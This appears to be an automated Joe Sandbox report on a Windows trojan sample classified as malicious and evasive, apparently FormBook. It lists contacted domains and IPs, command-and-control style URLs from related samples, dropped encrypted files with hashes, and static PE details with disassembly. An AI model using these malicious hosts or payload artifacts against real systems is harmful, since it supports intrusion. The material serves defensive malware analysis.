          https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.arthemis-168bet.siteReferer:explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.urbanholidayz.com/jd21/www.batremake.comexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.californiacurrentelectric.com/jd21/www.b2vvuc00.sbsexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.uhug.xyzexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://aka.ms/Vh5j3kexplorer.exe, 00000002.00000002.4148832143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108048542.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.maioral-store.com/jd21/www.zaib.artexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000002.00000003.3479427968.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3113987697.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.californiacurrentelectric.com/jd21/explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          66.235.200.145
          		californiacurrentelectric.comUnited States
          		13335CLOUDFLARENETUStrue
          65.21.196.90
          		00050591.xyzUnited States
          		199592CP-ASDEtrue

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1489361
          Start date and time:2024-08-07 12:46:07 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 11m 28s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:9
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:1
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Sample name:8t1uarSZFV.exe
          renamed because original name is a hash value
          Original Sample Name:b5c54101374cc75a2e4b8960243fbccfe81c267d9e05af3b72e10b2fa812aff5.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@8/4@11/2
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 52
          • Number of non-executed functions: 286
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Override analysis time to 240000 for current running targets taking high CPU consumption

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          06:47:40API Interceptor10548888x Sleep call for process: explorer.exe modified
          06:47:46API Interceptor9050144x Sleep call for process: netsh.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          66.235.200.1456ddrUd6iQo.exeGet hashmaliciousFormBookBrowse
          • www.baseinvestments.site/1zzj/
          AWB NO. 077-57676135055.exeGet hashmaliciousFormBookBrowse
          • www.lakemontbellevue.com/bjbg/
          DHL Receipt_AWB#20240079104.exeGet hashmaliciousFormBookBrowse
          • www.lakemontbellevue.com/ld28/?3Xd=detQRJhNSOte/MMKAeFCHQdrYsI9TT+LmPx5A1J5xMe4V34+sX8EdyBejeqfNCZfKSqZdnV4VnFNmZ4/AzmN1DMS5R4a1wm07eTy015a8TIqAfj/mBukJiQ=&Cdl=szJ4
          INVOICE087667899.exeGet hashmaliciousUnknownBrowse
          • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
          2FcJgghyXg.exeGet hashmaliciousFormBookBrowse
          • www.soccercitycupsc.com/us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKL
          ClbrTLBbVA.exeGet hashmaliciousFormBookBrowse
          • www.adornmentwithadrienne.com/ne28/?yXB=JRhSHg+E0kVeMb5bWxBNKjX7GZb/Gd7gTaCbDgRTO6UaOuEkMa6xiN+s4LYpa+moX3ut&DR-Hl=f48d7hbXPvmPj
          r5573XLX_Confirming_685738_Permiso.vbsGet hashmaliciousFormBookBrowse
          • www.shivanshnegi.com/hb6q/?kF=SLfnpSH8JFkD4JBvPgRq/MrmccQ0IKCWuyGgdNK0iEg51HeS6g2oNSkb61BOtzoBwxfmw1AFCol6MwSDOKA9DD+yD/DKRM1OfQ==&LPW33a=EJ_Y5C3RY2AMjvtQ
          BBVA-Confirming_Facturas_Pagadas_al_Vencimiento.vbsGet hashmaliciousFormBookBrowse
          • www.shivanshnegi.com/hb6q/?3t-_2h=lQe4u&_30_T=SLfnpSH8JFkD4JBvPgRq/MrmccQ0IKCWuyGgdNK0iEg51HeS6g2oNSkb61BOtzoBwxfmw1AFCol6MwSDOKA9DD+yD/DKRM1OfQ==
          GlobalImagingDocuments9575734549684.vbsGet hashmaliciousFormBookBrowse
          • www.shivanshnegi.com/g0c0/?J1ZahCdL=C0KZfCw3M9dgcVMegUaXT5mHrabIsWwgKIwZghABK/zPnQmv2J3/nbZH+UKlayZCqk+j1NVXNAMuRNCfj24K4Q5P5C8DM0dqWdfKhTZFySIl&uEk=kKVhb1ODb
          0ySMPNiDoA.exeGet hashmaliciousFormBookBrowse
          • www.theunstoppabletravelers.com/a19i/?4hkT=rLtsLZhSdQwFRkvaG8FjiaGEB8J9o/aSV6LeKN0wyHa1R2N5aTBKUDHw+apOLNME5B3p&aHzLRr=9rl0dna
          65.21.196.90COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
          • www.00050591.xyz/jd21/?tBZLfTtx=+5nsDbzeImt5UbX4GDv04YNxDKhKydlr4q6vzHl7qi3uGOgXSU0vDET8vanb4niZtoheVA==&oHEpRr=M2JpdRJ
          42ZjBoAnX1.rtfGet hashmaliciousFormBookBrowse
          • www.00050680.xyz/sk49/?aBWDfH=DP6tx2QHp&K4lp=5GTzvGjP6k9MjAkPrzxwWthptOK8N3QKes/6FYN5/ElPyt3wyqkU/OkBaVA77XqorlFk5g==

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          www.batremake.comCOMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
          • 213.186.33.5

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          CP-ASDEDHL SHIPPING DOCUMENT.exeGet hashmaliciousFormBookBrowse
          • 65.21.25.53
          woklsbEMwW.exeGet hashmaliciousVidarBrowse
          • 65.21.246.249
          https://arescz.ucetnictvi.uol.czGet hashmaliciousUnknownBrowse
          • 65.21.83.90
          SecuriteInfo.com.Trojan.Inject4.49019.7456.123.exeGet hashmaliciousUnknownBrowse
          • 65.21.213.208
          SecuriteInfo.com.Trojan.Inject4.49019.7456.123.exeGet hashmaliciousUnknownBrowse
          • 65.21.213.208
          COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
          • 65.21.196.90
          http://elca.com.co/risebyliftingothers/fxc/bWN2QGNvcmVkYy5jb20=Get hashmaliciousHTMLPhisherBrowse
          • 65.21.29.43
          eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
          • 65.21.127.168
          http://reedempayml.ogr.my.id/Get hashmaliciousHTMLPhisherBrowse
          • 65.21.235.194
          Autodesk AutoCAD 2023.exeGet hashmaliciousVidarBrowse
          • 65.21.246.249
          CLOUDFLARENETUSOwo_Trick_Private.exeGet hashmaliciousDiscord Token Stealer, Hog Grabber, ItroublveBOT StealerBrowse
          • 162.159.135.232
          https://urlty.co/wroITGet hashmaliciousUnknownBrowse
          • 104.21.90.242
          Investec Payment-Copy.pdfGet hashmaliciousHTMLPhisherBrowse
          • 162.159.61.3
          https://pdfelementcloud.wondershare.com/share/web?id=jFiYYQdoAI-6RmVGHw22jIeL9GaCw3femecA0QShb7bk8mwrF_UQJUUbKo_EQwKZmmQA1cOzTm1EOxcLJ15jTQGet hashmaliciousHTMLPhisherBrowse
          • 104.17.25.14
          https://dwrobotics.co.za/sjjsyGet hashmaliciousUnknownBrowse
          • 104.17.25.14
          709282738372873.exeGet hashmaliciousFormBookBrowse
          • 188.114.96.3
          DHL Package.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
          • 172.67.177.134
          https://24kjeans.com/5d9b8-7e8d4-0318b-e2566-1f7d4-f3581-c45d9-b8.phpGet hashmaliciousUnknownBrowse
          • 104.17.25.14
          INVOICE.exeGet hashmaliciousGuLoaderBrowse
          • 104.26.12.205
          NGL1Of0ZkJ.htaGet hashmaliciousCobalt Strike, AgentTeslaBrowse
          • 172.67.74.152

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Temp\aut2346.tmp

          Download File
          Process:C:\Users\user\Desktop\8t1uarSZFV.exe
          File Type:data
          Category:dropped
          Size (bytes):179814
          Entropy (8bit):7.98380918030497
          Encrypted:false
          SSDEEP:3072:y1kzP4JxBvIbp441aGGnR12hy8hlIxBZ2SXu3i0vCtQyYarqrQd0:bPgQm5qmxP/eUtQyZr0Qd0
          MD5:972EBA371B30366D90295542F4482A98
          SHA1:B6EC5FE819E940EA9C2ACFB958E8333CEAD6FF1F
          SHA-256:623488FD9561B4D53795A09CE298EC00EFC238956EA4AADF6E640D8D231F504E
          SHA-512:E0CB6546F16C7BC4A945FE88A8C65F48A6EA971FFEA4E29859F30B123701CD69A259FBE7B65848EF1424FF12308C8651179EAFB3305DCCAB7AD2D3447260E18E
          Malicious:false
          Reputation:low
          Preview:EA06.....Gc.=-N.9.DwzZ/c....{........{.....4.g..eN.Z..... ..L..*?...1..]0..<.g"...j.. .L$.I..Oo...4.....\a1..f.&.J,U.UB....6....%~.......%^..k9..t.....k.......Oi..u+.H..I2.t&.`......T.u..7....@.....g..D.L..@-.-.T.....i........4Sg3*d..iR*t...h...x..)....Q........i.....#......9......1~.....4b*t.|....{..?...o........................K...E...._....."......je3...v.p..s..D1.........\.....=...K]1......w...l.t..Cm..S2Zj.k.\..g...3[T.d;q....3...P.S...e.....+@.g.Q..KI).Df.l.s....6T{|..H.Q.d....q....3[[.o5.-e>m....y...wV.fx...#.E.B.:.2OI.~.0.es.*.q.X..`...\..k....mT..R..........R..-..M..6z.>.gS.{0tl.{...O..n.^...V......L.Ux.0..6.Ng\l.KYB..j.O..E(..*....A@....e........g..Nr.....D..']..owU...^<GJ...{./c=..Pl.X.W....ct....A....{f.......;AC.f....&{...8...2..U......E..p.7....].;.......U@...}...3..9.....o...X(}..6...q.:.d?[|....J/:...r....cO|.m....M..im;.76...l...KmC...-..#...^./...l.<x5_....1...Ri..U.=..#';.lqS.$'_.../.N%..x..x...6..R..Z...\.B.]..n1...w

          C:\Users\user\AppData\Local\Temp\aut2395.tmp

          Download File
          Process:C:\Users\user\Desktop\8t1uarSZFV.exe
          File Type:data
          Category:dropped
          Size (bytes):9720
          Entropy (8bit):7.629129793048073
          Encrypted:false
          SSDEEP:192:ZxCiuJsp1HXOIGVpsaKy8t21MeHQnq/eTWwoPbEpelKRqpx22lM73a:ZxCiIsp5XOmy6nWw44RqpM2lY3a
          MD5:A12776D536E47CCB49C89100C8632636
          SHA1:206391E067375BEF958AC94B4E159731829D5C9B
          SHA-256:8EAA6E3B92C6F8F4DFBFFA3AE9D7318F69A7E0ABBC7FF6816A86BC1DFAD818A5
          SHA-512:07513AA0164FCF2456BA863A9B7EBF21B1694EC77CB9286BB7CC507A4C88C9F976BA5FF28246C9A56857F9BE1366EEA12F2514278BCC0383A3A8895B714F78B0
          Malicious:false
          Reputation:low
          Preview:EA06..p........f..-.k5.g5.......ue..l....g9...y..oe.Ng..]....I...K........|.@.o..e.Nl......;.M...<..g.`........5.Z..q<..6.p.o.r..Y......g.<.M..`..Y....N...y.........<.M. ...r.'s....c ....Ad.H.....0.F.3<..Z..6...<.f....&....x..p....Bx.....Y'@0.N,.;,.t...Y.5_..n..... 5_..v.U...5_....U....5_..f.U..&.5\..>3@..N@^.d.Z..q9.z..u9......@.........G.@/Z..g......jx....t.u....$.../.u;...g@G_T.......>_.......zq8..........P..................`.M..`... ...f...@..@.'.7..@{>K,..c..,.p..Yg ._..v....A.>K(#G.e..3|vi..G.7...8_..qf..i|vi....f.h.,.@......5..:..-3{M....6`;..;..'.`.L..6...f..+0.ff.Y...9.......f.`.E...Y....3.y............vy.....`.....2p....<d....,vh...$......!+0.'&.....,fu5.Y..Y......r.5.X...c3.<.ki.Y.!...Gf.....,f.<.N. . .#:.....c.`........v.h.s.....,vl...,..t......40.....f.........4..@.6.-..p..S.E..5...S`.N...;8.`..<.......q;.....c....Z&..wx.....vr........E......y6....p.c3.=..7..b.!....F ...B5f...........vt......fvk=.x...B3......;;.X...d....8........g`...Mg..D..f...

          C:\Users\user\AppData\Local\Temp\misrun

          Download File
          Process:C:\Users\user\Desktop\8t1uarSZFV.exe
          File Type:data
          Category:dropped
          Size (bytes):189440
          Entropy (8bit):7.824369272707001
          Encrypted:false
          SSDEEP:3072:6Db7veE2apWPscQrKTgcUYbZb+YHbNUoGTNhn5ngVc4+CSVcAr1SnMDfq7kVS5C1:IPsapWwrKccdbZbFNhG5nVFVcArNDi70
          MD5:BCCBCB8A5E5B6FB462F3D91B49E85F07
          SHA1:0F707A1B3ED92789D88901349C4502E432AD94F0
          SHA-256:E472C56D121791D2F5D7C705F4678E34BBEBCAAC42AE6E6AF8C43AA1D6E43FDD
          SHA-512:62A6561082C20BE4881D2580C940052E815449843C1D8113A7A769FB5FC1FCCDA12B7F5B7CE3995451EB7318DE27C4A05E9F7BD874BAC6A98F1596F47DEFADA9
          Malicious:false
          Reputation:low
          Preview:.....SO92...E..q.O:...eO[...MSO92I8MLSGZQMSO92I8MLSGZQMSO9.I8MBL.TQ.Z...Ht.m./3"m#=VU;Y l0&4?"'o[WiJ8"s.4q...._&\(b^JPuMSO92I8.[...+.T...*.Z...._..8....<.S....^..:$2..5.92I8MLSGZQMSO92Ih.LS.[PM....I8MLSGZQ.SM89H2ML.EZQMSO92I8-.RGZAMSO.0I8M.SGJQMSM92L8LLSGZQHSN92I8ML.EZQOSO92I8OL..ZQ]SO)2I8M\SGJQMSO92Y8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8c86?.QMS..0I8]LSG.SMS_92I8MLSGZQMSO9.I8-LSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8MLSGZQMSO92I8M

          C:\Users\user\AppData\Local\Temp\wainage

          Download File
          Process:C:\Users\user\Desktop\8t1uarSZFV.exe
          File Type:ASCII text, with very long lines (28674), with no line terminators
          Category:dropped
          Size (bytes):28674
          Entropy (8bit):3.5754864862650506
          Encrypted:false
          SSDEEP:768:JxU+eScFCo3T3iC9vp3IntIU++nN+nOkW/est2Hz0mL5sCWi:s+eScFCo3T3i8vp3IntIU++nN+nOkW/o
          MD5:5C551CB1B10EACD57846BB95F762DC85
          SHA1:F4C0094B718CBFE63BDB34657CDDF079249B8354
          SHA-256:3823D4D2E701714D58F527DE17722F3F6F73FFEBEE98868EDE90F7004BB21094
          SHA-512:F1F4A1F9A6311D032C1758CE035966F6EA2736AA87C75A504F5C439ED1FAA0B4E3B588C1BCE508EADE40D1079D58E46E62632F7B4B16B7CF2D34AD261950DC06
          Malicious:false
          Reputation:low
          Preview:3{88;ehf;4hfff353333898:e;9e33333399;<78;7e<9833333399;<7g;9ed:533333399;<88;;e;9h33333399;<78;de<9833333399;<7g;fed9f33333399;<88;he;6633333399;<78<3e<6533333399;<7g<5ed5h33333399;<88<7e;9733333399;<78<9e<9f33333399;<7g<;ed9f33333399;<88<d66f399;<78<fe<9h33333399;<;g77iiiiiied:733333399;<<879iiiiiie;9733333399;<;87;iiiiiie<9f33333399;<;g7diiiiiied9f33333399;<<87fiiiiiie;5h33333399;<;87hiiiiiie<9733333399;<;g83iiiiiied9f33333399;<<885iiiiiie;9f33333399;<;887iiiiii66f<99;<;g89iiiiiied:833333399;<88g3e;:633333399;<78g5e<9833333399;<7gg7ed:533333399;<88g9e;6633333399;<78g;e<6533333399;<7ggded5h33333399;<88gfe;9733333399;<78ghe<9f33333399;<7gh3ed9f33333399;<88h566f399;<78h7e<9433333399;<;g9;iiiiiied9733333399;<<89diiiiiie;:933333399;<;89fiiiiiie<9433333399;<;g9hiiiiiied:333333399;<<8:3iiiiiie;9<33333399;<;8:5iiiiiie<6633333399;<;g:7iiiiiied6533333399;<<8:9iiiiiie;5h33333399;<;8:;iiiiiie<9733333399;<;g:diiiiiied9f33333399;<<8:fiiiiiie;9f33333399;<;8:hiiiiii66f<99;<7g;3ed:633333399;<88d3e;9;

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):6.968898104484643
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:8t1uarSZFV.exe
          File size:1'118'208 bytes
          MD5:14876f2aecbf08493108d81f260bfe7a
          SHA1:ef0dfe01cecc9972141738f251a235059082b106
          SHA256:b5c54101374cc75a2e4b8960243fbccfe81c267d9e05af3b72e10b2fa812aff5
          SHA512:aff1f1d1dbc16059a895919a595902db67a59ea3eba46263defed3111a7fb0d3c241237c04a265c8045a6d52e313db6fdbc71ec01626bd30350210818820e774
          SSDEEP:24576:xqDEvCTbMWu7rQYlBQcBiT6rprG8af5sFc/sq97F:xTvC/MTQYxsWR7afSckQ7
          TLSH:4435BF0273C1C062FFAB96334B5AF6515BBC69260123E62F13A81D79BD701B1563E7A3
          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

          File Icon

          Icon Hash:aaf3e3e3938382a0

          Static PE Info

          General

          Entrypoint:0x420577
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
          Time Stamp:0x66A03C43 [Tue Jul 23 23:26:59 2024 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:1
          File Version Major:5
          File Version Minor:1
          Subsystem Version Major:5
          Subsystem Version Minor:1
          Import Hash:948cc502fe9226992dce9417f952fce3

          Entrypoint Preview

          Instruction
          call 00007FCFA856BEF3h
          jmp 00007FCFA856B7FFh
          push ebp
          mov ebp, esp
          push esi
          push dword ptr [ebp+08h]
          mov esi, ecx
          call 00007FCFA856B9DDh
          mov dword ptr [esi], 0049FDF0h
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          and dword ptr [ecx+04h], 00000000h
          mov eax, ecx
          and dword ptr [ecx+08h], 00000000h
          mov dword ptr [ecx+04h], 0049FDF8h
          mov dword ptr [ecx], 0049FDF0h
          ret
          push ebp
          mov ebp, esp
          push esi
          push dword ptr [ebp+08h]
          mov esi, ecx
          call 00007FCFA856B9AAh
          mov dword ptr [esi], 0049FE0Ch
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          and dword ptr [ecx+04h], 00000000h
          mov eax, ecx
          and dword ptr [ecx+08h], 00000000h
          mov dword ptr [ecx+04h], 0049FE14h
          mov dword ptr [ecx], 0049FE0Ch
          ret
          push ebp
          mov ebp, esp
          push esi
          mov esi, ecx
          lea eax, dword ptr [esi+04h]
          mov dword ptr [esi], 0049FDD0h
          and dword ptr [eax], 00000000h
          and dword ptr [eax+04h], 00000000h
          push eax
          mov eax, dword ptr [ebp+08h]
          add eax, 04h
          push eax
          call 00007FCFA856E59Dh
          pop ecx
          pop ecx
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          lea eax, dword ptr [ecx+04h]
          mov dword ptr [ecx], 0049FDD0h
          push eax
          call 00007FCFA856E5E8h
          pop ecx
          ret
          push ebp
          mov ebp, esp
          push esi
          mov esi, ecx
          lea eax, dword ptr [esi+04h]
          mov dword ptr [esi], 0049FDD0h
          push eax
          call 00007FCFA856E5D1h
          test byte ptr [ebp+08h], 00000001h
          pop ecx

          Rich Headers

          Programming Language:
          • [ C ] VS2008 SP1 build 30729
          • [IMP] VS2008 SP1 build 30729

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x3a600.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x10f0000x7594.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc0xd40000x3a6000x3a600a7d85690ed52c69bac464be37812a85cFalse0.8882285532655246data7.796236412260973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x10f0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

          Resources

          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
          RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
          RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
          RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
          RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
          RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
          RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
          RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
          RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
          RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
          RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
          RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
          RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
          RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
          RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
          RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
          RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
          RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
          RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
          RT_RCDATA0xdc7b80x318c6data1.000349839862035
